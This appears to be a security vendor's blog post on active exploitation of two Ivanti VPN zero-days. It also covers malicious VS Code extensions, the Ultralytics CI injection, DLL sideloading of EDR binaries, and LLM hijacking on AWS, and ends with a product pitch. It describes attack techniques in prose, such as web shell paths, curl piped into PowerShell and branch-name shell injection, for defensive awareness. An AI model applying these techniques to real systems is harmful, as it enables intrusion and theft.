Ivanti Zero-Day Exploit Targets VPN Infrastructure

Ivanti 0-Days in the Wild: Analyzing CVE-2025-0282 and CVE-2025-0283 Amidst a Dynamic Threat Environment

Estimated reading time: 7 minutes

Key Takeaways

• Ivanti Connect Secure VPN appliances are under active exploitation for two critical zero-day vulnerabilities, CVE-2025-0282 and CVE-2025-0283, enabling unauthenticated remote code execution since December 2024.
• The current threat landscape extends beyond direct product vulnerabilities to include sophisticated supply chain attacks (e.g., VS Code, Ultralytics), abuse of legitimate security tools (e.g., Storm-0249 weaponizing EDR), and targeted attacks against emerging technologies like Large Language Models (LLMs) (e.g., JINX-2401).
• Multiple threat actors, including China-nexus cluster UNC5337 and others using unique malware like DRYHOOK and PHASEJAM, are actively engaged in exploiting these Ivanti vulnerabilities.
• Organizations must adopt a multi-layered security approach, emphasizing prompt patch management, rigorous supply chain security, advanced behavioral threat detection, strict Identity and Access Management (IAM), and comprehensive threat intelligence integration.
• PurpleOps offers a robust cyber threat intelligence platform with real-time ransomware intelligence, dark web monitoring, supply-chain risk monitoring, and breach detection services to help organizations navigate and defend against these complex and evolving threats.

Table of Contents

• CVE-2025-0282 and CVE-2025-0283: Ivanti 0-Days Under Scrutiny
  • CVE-2025-0282
  • CVE-2025-0283
  • Exploitation in the Wild
  • Indicators of Compromise (IOCs)
  • Affected Products
  • Risk to Cloud Environments
• The Evolving Threat Environment: Beyond Direct Exploitation
  • Supply Chain Compromises
    • VS Code Supply Chain Attack
    • Ultralytics AI Library Hacked
  • Abuse of Legitimate Security Tools and Infrastructure
    • Storm-0249 Abuses EDR Process
  • Targeting Emerging AI/Cloud Services
    • LLM Hijacking on AWS (JINX-2401)
• Operational Security Measures for Organizations
• PurpleOps: Comprehensive Security in a Complex Threat Environment
• Frequently Asked Questions (FAQ)

CVE-2025-0282 and CVE-2025-0283: Ivanti 0-Days Under Scrutiny

Ivanti has confirmed the active exploitation of CVE-2025-0282 and CVE-2025-0283. These vulnerabilities affect Ivanti Connect Secure, Ivanti Policy Secure, and Ivanti Neurons for ZTA Gateways, devices often critical for secure remote access.

CVE-2025-0282

This vulnerability is an unauthenticated stack-based buffer overflow affecting Ivanti Connect Secure (ICS) VPN appliances, as well as Policy Secure and Neurons for ZTA Gateways. Its nature allows attackers to execute arbitrary code remotely without requiring prior authentication. Exploitation typically involves sending specially crafted inputs to the appliance. These inputs are designed to overwhelm an internal memory buffer, causing it to overwrite critical sections of memory. This can lead to the attacker gaining full control of the system, enabling the deployment of malware, extensive reconnaissance, and potential compromise of downstream networks. This vulnerability is specific to certain versions, necessitating prior reconnaissance by attackers to identify the appliance version before successful exploitation.

CVE-2025-0283

This is another vulnerability impacting Ivanti Connect Secure appliances. Fewer specific details have been publicly disclosed regarding its exact nature as of early January 2025. Current analysis suggests it may relate to privilege escalation or improper input validation, which could allow attackers to amplify their access on systems that have already been compromised. While the technical specifics are less detailed, it is considered critical to patch, as it could be exploited in conjunction with CVE-2025-0282 to facilitate more complex and impactful attack chains.

Exploitation in the Wild

Mandiant has observed exploitation of CVE-2025-0282 in the wild since December 2024, with attackers leveraging the vulnerability for unauthenticated remote code execution. Attackers initiate the process with reconnaissance, querying specific URLs to determine the ICS appliance version. These reconnaissance efforts often originate from Virtual Private Server (VPS) providers or Tor networks, which helps mask the attackers’ identities. Once the version is identified, a crafted payload is delivered to trigger the stack-based buffer overflow, leading to remote code execution.

Post-exploitation, attackers modify system settings to prepare the appliance for malware deployment. This includes disabling SELinux and remounting the filesystem. Web shells are then injected into legitimate ICS components to establish persistence and remote access. Examples of such web shell injection include files like /home/webserver/htdocs/dana-na/auth/getComponent.cgi and /home/webserver/htdocs/dana-na/auth/restAuth.cgi. Additional payloads, such as Base64-encoded scripts and ELF binaries, are also deployed to expand control and capabilities.

Some campaigns exploiting these vulnerabilities have been attributed to UNC5337, a China-nexus cluster. Other observed campaigns involve unidentified actors utilizing unique malware families termed DRYHOOK and PHASEJAM, indicating that multiple threat actors are engaged in exploiting these vulnerabilities.

Indicators of Compromise (IOCs)

Mandiant has reported the following indicators associated with these exploits:

Affected Products

The following versions and products are affected:

For CVE-2025-0282:

• Ivanti Connect Secure: Versions 22.7R2 through 22.7R2.4
• Ivanti Policy Secure: Versions 22.7R1 through 22.7R1.2
• Ivanti Neurons for ZTA Gateways: Versions 22.7R2 through 22.7R2.3

For CVE-2025-0283:

• Ivanti Connect Secure: Versions 22.7R2.4 and prior; Versions 9.1R18.9 and prior
• Ivanti Policy Secure: Versions 22.7R1.2 and prior
• Ivanti Neurons for ZTA Gateways: Versions 22.7R2.3 and prior

Risk to Cloud Environments

According to Wiz data, less than 1% of cloud enterprise environments are directly vulnerable to these specific Ivanti vulnerabilities. While this percentage may appear low, the impact on affected organizations can be severe, emphasizing the need for targeted mitigation.

The Evolving Threat Environment: Beyond Direct Exploitation

The exploitation of Ivanti 0-days is one facet of a continually changing threat environment. Organizations must also contend with sophisticated supply chain attacks, the abuse of legitimate security tools, and emerging threats targeting cloud and artificial intelligence infrastructure.

Supply Chain Compromises

Supply chain attacks present a significant challenge by injecting malicious code into trusted software or components.

VS Code Supply Chain Attack

ReversingLabs researchers identified a sophisticated malware campaign within the Visual Studio Code (VS Code) Marketplace involving 19 malicious extensions. This campaign, active since February 2025, bypassed standard detection methods by embedding payloads deep within dependency folders. Attackers used “typosquatting-adjacent” tactics and steganography. For instance, a deceptive file named banner.png appeared to be a standard image but was a weaponized archive containing two malicious binaries. The attack exploited how VS Code extensions bundle dependencies, specifically modifying the highly popular path-is-absolute package locally within their malicious extensions. This manipulation occurred without altering the official npm registry version. The malicious code within the compromised dependency’s index.js file executed upon VS Code startup, triggering a hidden class to decode a JavaScript dropper from a file named lock. This dropper then extracted the payload from the fake PNG file. The decoded dropper executed the malicious binaries using cmstp.exe, a legitimate Microsoft Connection Manager Profile Installer tool, often abused by attackers as a “Living Off the Land” (LOLBIN) binary to bypass security controls. One binary emulated key presses, while the other was identified as a Rust trojan. Four extensions used a different vector, modifying the @actions/io package and hiding payloads in TypeScript (.ts) and sourcemap (.map) files instead of an image. Organizations require supply-chain risk monitoring to detect such sophisticated attacks.

Ultralytics AI Library Hacked

A supply chain attack targeted deployment versions of the Ultralytics Python package, a widely used AI image prediction library. Compromised versions 8.3.41 and 8.3.42, hosted on PyPI, contained malicious code that executed unauthorized cryptocurrency mining software (XMRig). The unique aspect of this incident was the compromise vector: the CI/CD workflow. An external malicious actor, using a GitHub user named openimbot, manipulated GitHub Actions by exploiting branch names in pull requests. This allowed the execution of arbitrary code, bundling a cryptominer into the package. The vulnerable workflow, “Publish Docs,” ran upon every pull request creation. The attacker crafted branch names to pipe shell script content directly into a bash session, bypassing typical input sanitization. The malicious changes were found in v8.3.41/ultralytics/models/yolo/model.py and v8.3.41/ultralytics/utils/downloads.py. This incident highlights the need for stringent security practices throughout the software development lifecycle. Ultralytics is present in 10% of cloud environments, making this a significant target. Threat actor tactics and motivation are often shared and discussed in underground forum intelligence.

Abuse of Legitimate Security Tools and Infrastructure

Threat actors are increasingly misusing trusted processes and tools to evade detection.

Storm-0249 Abuses EDR Process

The initial access broker (IAB) “Storm-0249” has shifted tactics from broad phishing to surgical strikes that weaponize Endpoint Detection and Response (EDR) processes. The group is specifically abusing components of SentinelOne to cloak their activities and facilitate ransomware attacks. Their technique involves DLL sideloading: malicious MSI packages are distributed via phishing, often employing “ClickFix” social engineering. When executed with SYSTEM privileges, the installer drops a legitimate, digitally signed SentinelAgentWorker.exe (a core SentinelOne component) into a user’s AppData folder. Alongside it, a malicious SentinelAgentCore.dll is placed. When the legitimate SentinelOne binary launches, it loads the malicious DLL instead, making its activities appear as routine EDR operations to network defenders. This allows attackers to bypass signature-based detection and establish encrypted command-and-control (C2) channels disguised as legitimate telemetry. It is important to note that this does not indicate a vulnerability in SentinelOne itself, but rather an abuse of trust in signed binaries. Storm-0249 also uses “Living off the Land” (LoL) techniques, creating spoofed Microsoft URLs and using curl.exe to fetch malicious scripts and pipe them directly into PowerShell’s memory. This creates a “fileless” attack chain, minimizing forensic evidence. The ultimate objective is to sell access to ransomware groups like LockBit and ALPHV. The group conducts reconnaissance to extract the MachineGuid, a unique system identifier, to accelerate time-to-impact for ransomware affiliates. Effective breach detection is necessary to identify such stealthy intrusions. Organizations need real-time ransomware intelligence and a live ransomware API for rapid incident response to counter these evolving ransomware tactics.

Targeting Emerging AI/Cloud Services

The expansion of AI and cloud services introduces new attack surfaces.

LLM Hijacking on AWS (JINX-2401)

Wiz Research identified JINX-2401 attempting to hijack LLM models across multiple AWS environments since November 2024. This campaign leverages compromised IAM user access keys (AKIA) to gain initial access to cloud accounts and invoke Bedrock models. The actor employed unique techniques for privilege escalation and persistence, including creating new IAM users, IAM access keys, and policies with Bedrock permissions. A console profile was created for the new IAM user, likely to complete the LLM agreement process via PutUseCaseForModelAccess. Subsequent attempts to request access to models using CreateFoundationModelAgreement were blocked by Service Control Policies (SCPs). Attack attempts originated from Proton VPN IP addresses. The actor used consistent naming schemes for IAM users (e.g., ^[A-Z][a-z]{5}[0-9]{3}$) and policies (New_Policy), with specific Bedrock permissions. Invoked models included anthropic.claude-3-sonnet-20240229-v1:0 and anthropic.claude-v2. This type of activity is often coordinated and discussed within dark web monitoring service and telegram threat monitoring channels where threat actors exchange information and tools. Such compromises can lead to brand leak alerting if sensitive data is processed or exfiltrated through these hijacked models.

Operational Security Measures for Organizations

In response to the current threat landscape, organizations should implement a multi-layered security approach:

• Vulnerability and Patch Management: Promptly apply security updates for critical software, especially for known zero-day vulnerabilities like the Ivanti CVEs. Regular scanning of external and internal systems for exposed vulnerabilities is essential. For cloud environments, implement Service Control Policies (SCPs) to restrict and limit access to sensitive services like Bedrock models, allowing access only for specific, authorized members.
• Supply Chain Security: Institute rigorous validation processes for all third-party components and dependencies, particularly within software development and CI/CD pipelines. This includes scrutinizing bundled dependencies in software packages, such as those found in node_modules, to identify any hidden malicious modifications. Organizations should develop internal standards for supply-chain information security.
• Advanced Threat Detection and Response: Move beyond signature-based detection to advanced behavioral analytics. Monitor for anomalous activities such as unusual DLL loading from non-standard locations (e.g., AppData), unexpected use of Living Off the Land Binaries (LOLBINs) like cmstp.exe or curl.exe by security agents, and suspicious API calls or failed attempts within cloud environments. Proactive breach detection capabilities are fundamental for identifying sophisticated intrusions that mimic legitimate activity.
• Identity and Access Management (IAM): Adhere strictly to the principle of least privilege for all IAM users and roles in cloud and on-premises environments. Implement regular audits of access keys, permissions, and user activity. Enforce strong authentication mechanisms, including multi-factor authentication (MFA), to mitigate the impact of compromised credentials.
• Threat Intelligence Integration: Integrate comprehensive threat intelligence feeds into security operations. This includes consuming IOCs, Tactics, Techniques, and Procedures (TTPs) for newly discovered vulnerabilities and active campaigns. Understanding how threat actors share information and tools through channels visible to dark web monitoring service and underground forum intelligence provides critical context for proactive defense.

PurpleOps: Comprehensive Security in a Complex Threat Environment

Organizations require sophisticated tools and expert insights to defend against threats such as the Ivanti 0-days, intricate supply chain attacks, the abuse of EDR processes, and LLM hijacking. PurpleOps delivers a cyber threat intelligence platform engineered to provide organizations with relevant and timely insights into these and other complex threats.

Our platform incorporates real-time ransomware intelligence and offers a live ransomware API for swift and informed responses to emergent ransomware threats. PurpleOps integrates dark web monitoring service, telegram threat monitoring, and underground forum intelligence to provide early warnings and contextual understanding of threat actor methodologies, enabling the identification of precursor activities and potential targeting.

Specialized supply-chain risk monitoring capabilities assist in securing development pipelines and third-party dependencies against attacks similar to those observed in VS Code and Ultralytics. Our breach detection services are designed to identify subtle anomalies, recognizing sophisticated tactics like DLL sideloading and fileless attacks that evade traditional defenses. We also provide brand leak alerting to safeguard digital assets and maintain reputational integrity.

PurpleOps’ expertise extends to proactive security measures through red-team operations and penetration testing, designed to uncover weaknesses before adversaries exploit them. Our tailored supply-chain information security and protect-ransomware services offer comprehensive defense strategies against the most pressing cyber risks. With PurpleOps, organizations gain enhanced visibility and a strategic advantage against current and future cyber threats.

To understand how PurpleOps can enhance your organization’s cybersecurity posture against these and other advanced threats, explore our platform and PurpleOps Solutions, or contact us for a detailed discussion.

Frequently Asked Questions (FAQ)